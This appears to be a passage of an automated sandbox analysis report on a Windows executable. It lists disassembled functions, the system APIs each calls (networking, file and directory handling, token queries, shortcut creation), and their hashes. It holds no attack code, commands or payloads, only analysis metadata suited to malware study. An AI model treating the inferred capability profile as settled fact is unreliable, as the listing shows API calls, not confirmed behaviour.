                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: ade47c51558875b45ead8956d332288818681f0a2b8ad1ceb68c339932b99ca8
                                                                                  • Instruction ID: 818f676ad02499849a810723a3b85eb51c4c42999bc4ba9b97d8c75c75e86197
                                                                                  • Opcode Fuzzy Hash: ade47c51558875b45ead8956d332288818681f0a2b8ad1ceb68c339932b99ca8
                                                                                  • Instruction Fuzzy Hash: 6021C635A006287BEB10AA65AC4AFDE7F79BF9B710F000025FA05FB1C1DB708D4597A1
                                                                                  Function 00536318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F50E6: _wcsncpy.LIBCMT ref: 004F50FA
                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,005360C3), ref: 00536369
                                                                                  • GetLastError.KERNEL32(?,?,?,005360C3), ref: 00536374
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005360C3), ref: 00536388
                                                                                  • _wcsrchr.LIBCMT ref: 005363AA
                                                                                    • Part of subcall function 00536318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005360C3), ref: 005363E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                  • String ID:
                                                                                  • API String ID: 3633006590-0
                                                                                  • Opcode ID: c7ff2a2c450cfa10f2c1db289d5855dd677b5e7345866b75b0893ad23c822a3e
                                                                                  • Instruction ID: e66ee1237850b7a700816844f7f6046882267cae9fbef768690b85e79132c3d5
                                                                                  • Opcode Fuzzy Hash: c7ff2a2c450cfa10f2c1db289d5855dd677b5e7345866b75b0893ad23c822a3e
                                                                                  • Instruction Fuzzy Hash: B12108315042166BEB25AB78AC46FEE2BBCFF153A0F10886DF005D70C1EB60D9C59A65
                                                                                  Function 00548B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0054A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00548BD3
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548BE2
                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00548BFE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3701255441-0
                                                                                  • Opcode ID: 9dd965f1728f6081819841a63e695690b358661a85c6a4e2aa2b32cea4e15120
                                                                                  • Instruction ID: c0f46969fd6a83f0341751f06184a8a7d7a1d79793edc7216e03077eef4d1c9e
                                                                                  • Opcode Fuzzy Hash: 9dd965f1728f6081819841a63e695690b358661a85c6a4e2aa2b32cea4e15120
                                                                                  • Instruction Fuzzy Hash: F121C0312002159FDB14AF28DC89FBE7BB9FF98714F044459F906AB2D2CB74AC469B61
                                                                                  Function 00548420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 00548441
                                                                                  • GetForegroundWindow.USER32 ref: 00548458
                                                                                  • GetDC.USER32(00000000), ref: 00548494
                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 005484A0
                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 005484DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                  • String ID:
                                                                                  • API String ID: 4156661090-0
                                                                                  • Opcode ID: 40c7f7d74ea3892845095342f5b1d33436c28f7b565a176385d2313030f2f555
                                                                                  • Instruction ID: 479841e4838695e89c7c96decdfd9f5ea8aa062a28d073cb57aac79d8dd62bf9
                                                                                  • Opcode Fuzzy Hash: 40c7f7d74ea3892845095342f5b1d33436c28f7b565a176385d2313030f2f555
                                                                                  • Instruction Fuzzy Hash: 11219975A00205AFDB00DF64DC89AAEBBF5FF48305F048479E959D7251DB70AD44DB60
                                                                                  Function 0050AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0050AFF2
                                                                                  • BeginPath.GDI32(?), ref: 0050B009
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0050B033
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: d4391eddb11054ad33002dc554358bde5d4cede07a771225482c392df3fcf506
                                                                                  • Instruction ID: aa447e59d64e0ba5e5123e9063c1b9df02eb739862858d39f865d311da2eeb1b
                                                                                  • Opcode Fuzzy Hash: d4391eddb11054ad33002dc554358bde5d4cede07a771225482c392df3fcf506
                                                                                  • Instruction Fuzzy Hash: 0521A1B5800705EFDB60DF94ECA87AE7F78BB30395F58431AE424921E0D3706889EB58
                                                                                  Function 0051217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __calloc_crt.LIBCMT ref: 005121A9
                                                                                  • CreateThread.KERNEL32(?,?,005122DF,00000000,?,?), ref: 005121ED
                                                                                  • GetLastError.KERNEL32 ref: 005121F7
                                                                                  • _free.LIBCMT ref: 00512200
                                                                                  • __dosmaperr.LIBCMT ref: 0051220B
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                  • String ID:
                                                                                  • API String ID: 2664167353-0
                                                                                  • Opcode ID: acd0db341af9205f393896309664c38a345a2e86ce6ab8ec9256116c2616d8ca
                                                                                  • Instruction ID: ef0591f62043062d3be74ab592b39fc8ddb6c22b8cfe54a1208f3b714288851d
                                                                                  • Opcode Fuzzy Hash: acd0db341af9205f393896309664c38a345a2e86ce6ab8ec9256116c2616d8ca
                                                                                  • Instruction Fuzzy Hash: 1211E53610470B6FBB11AF699C45DDF3FA8FF44760F100529F92486141EB3188E19AA0
                                                                                  Function 0052ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
                                                                                  • GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
                                                                                  • HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: 4927427605308070d7b5c5400035f10c9d29ede7ac33465db768eca7071a618b
                                                                                  • Instruction ID: 1ac9b530a52075d51144fd2d33064e055bcc6a9651a040f95236c3701ef004b8
                                                                                  • Opcode Fuzzy Hash: 4927427605308070d7b5c5400035f10c9d29ede7ac33465db768eca7071a618b
                                                                                  • Instruction Fuzzy Hash: 0201F671210214BFDB104FA9EC48DAB3EBDFF8A7557100429F949D62A0DA719C84EA71
                                                                                  Function 00537A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537A74
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A82
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00537A8A
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A94
                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: e7b339fb92cfc1a29b1dfde01e87f6ec086ed85e98eb3ff4c19dabd2f9e1b7c9
                                                                                  • Instruction ID: 54d732dfe0cbc8d77fb7298f1a124554006ff07913180189176cb8500225f244
                                                                                  • Opcode Fuzzy Hash: e7b339fb92cfc1a29b1dfde01e87f6ec086ed85e98eb3ff4c19dabd2f9e1b7c9
                                                                                  • Instruction Fuzzy Hash: DE0132B1C0862DEBCF10ABA4EC48AEDBB78FF1C311F440445E402B2250DB309698EBA1
                                                                                  Function 00529ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32 ref: 00529ADC
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 00529AF7
                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00529B05
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00529B15
                                                                                  • CLSIDFromString.OLE32(?,?), ref: 00529B21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: 3a50affbe5ddc129b6118123a2acd5e8b807082abde71c627e9ae77d3928440a
                                                                                  • Instruction ID: 2ca31a9d72ae9bcb030872b5854f18a0d65e3a8fff56116727c59de95d63a172
                                                                                  • Opcode Fuzzy Hash: 3a50affbe5ddc129b6118123a2acd5e8b807082abde71c627e9ae77d3928440a
                                                                                  • Instruction Fuzzy Hash: 84017C76A10224ABDB104F54FC44A9ABEBDEF59351F144028F909D2250D771DD44ABB0
                                                                                  Function 0052AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0052AA79
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0052AA83
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0052AA92
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0052AA99
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0052AAAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 46400447d70a4de73ce2f22eb04152fd2c418cb92fe365f9805c218801710e0d
                                                                                  • Instruction ID: fc0310b343d8cd2aa96425783ea44abd42eead8a8ac7785088d9a160725cf9a5
                                                                                  • Opcode Fuzzy Hash: 46400447d70a4de73ce2f22eb04152fd2c418cb92fe365f9805c218801710e0d
                                                                                  • Instruction Fuzzy Hash: 3DF03C71200214AFEB115FA4FC89E673BBCFF5A754B100829F945D6190DB619C86EA71
                                                                                  Function 0052AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0052AADA
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAE4
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAF3
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAFA
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AB10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: dc2fbf2223426c42a571af8bcaa5f7273f8d95da2192a44e0d096ab1a37f3580
                                                                                  • Instruction ID: 9189d9bf3df6676aa69e61465d7fb9dc474e8fcdb649df14d20d533b4cc93b60
                                                                                  • Opcode Fuzzy Hash: dc2fbf2223426c42a571af8bcaa5f7273f8d95da2192a44e0d096ab1a37f3580
                                                                                  • Instruction Fuzzy Hash: 93F04F71200318AFEB110FA4FC88E673B7DFF46754F100429F945D7190DA619845EA71
                                                                                  Function 0052EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0052EC94
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0052ECAB
                                                                                  • MessageBeep.USER32(00000000), ref: 0052ECC3
                                                                                  • KillTimer.USER32(?,0000040A), ref: 0052ECDF
                                                                                  • EndDialog.USER32(?,00000001), ref: 0052ECF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: 0ad04b1121eca24887b94bbd3c602115c2586b1c851e28de3f8f42ce5d45dd4e
                                                                                  • Instruction ID: dd1ee904b68d29f42daf04e808a3e6539f6f8e3feb91815943b346da37e88cdc
                                                                                  • Opcode Fuzzy Hash: 0ad04b1121eca24887b94bbd3c602115c2586b1c851e28de3f8f42ce5d45dd4e
                                                                                  • Instruction Fuzzy Hash: 04018170500714ABEB245B50FE5FB96BBB8FF11705F000559B686B14E0DBF4AE88EB50
                                                                                  Function 0050B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 0050B0BA
                                                                                  • StrokeAndFillPath.GDI32(?,?,0056E680,00000000,?,?,?), ref: 0050B0D6
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0050B0E9
                                                                                  • DeleteObject.GDI32 ref: 0050B0FC
                                                                                  • StrokePath.GDI32(?), ref: 0050B117
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: 90fe206d47f8c39c373f04a4a8a85d74b9b78d441e260b36ea5f3c7604498570
                                                                                  • Instruction ID: 0169cb09ae02be4d572c7fa788c97b25e673ffc138746039f847cd7184c54342
                                                                                  • Opcode Fuzzy Hash: 90fe206d47f8c39c373f04a4a8a85d74b9b78d441e260b36ea5f3c7604498570
                                                                                  • Instruction Fuzzy Hash: B1F0F635000A08AFEBA19FA5EC1D7A83F74BB20362F488314E429444F0D7309999FF28
                                                                                  Function 0053F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0053F2DA
                                                                                  • CoCreateInstance.OLE32(0057DA7C,00000000,00000001,0057D8EC,?), ref: 0053F2F2
                                                                                  • CoUninitialize.OLE32 ref: 0053F555
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 948891078-24824748
                                                                                  • Opcode ID: 8d0be0e1d33c2af582adfc40b1f077122ad514da6614240656697a86144180ac
                                                                                  • Instruction ID: fa1968a0e89d7349d1dd371516f65945006ea4a733e8b6397ae3c6bcf90d6af9
                                                                                  • Opcode Fuzzy Hash: 8d0be0e1d33c2af582adfc40b1f077122ad514da6614240656697a86144180ac
                                                                                  • Instruction Fuzzy Hash: D2A11A71104205AFD300EF64C885EAFBBE8FF98718F00495DF65597192EB74EA49CBA2
                                                                                  Function 0053E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
                                                                                  • CoInitialize.OLE32(00000000), ref: 0053E85D
                                                                                  • CoCreateInstance.OLE32(0057DA7C,00000000,00000001,0057D8EC,?), ref: 0053E876
                                                                                  • CoUninitialize.OLE32 ref: 0053E893
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2126378814-24824748
                                                                                  • Opcode ID: e41899405f5fa70afe430c84ea390ef5a68ac15a632d545d26e2b751ff3a09d9
                                                                                  • Instruction ID: 4d0340d96f83fb61436bb37a934bfdd05eb35531f63a81b6fe540a3ac86f88fe
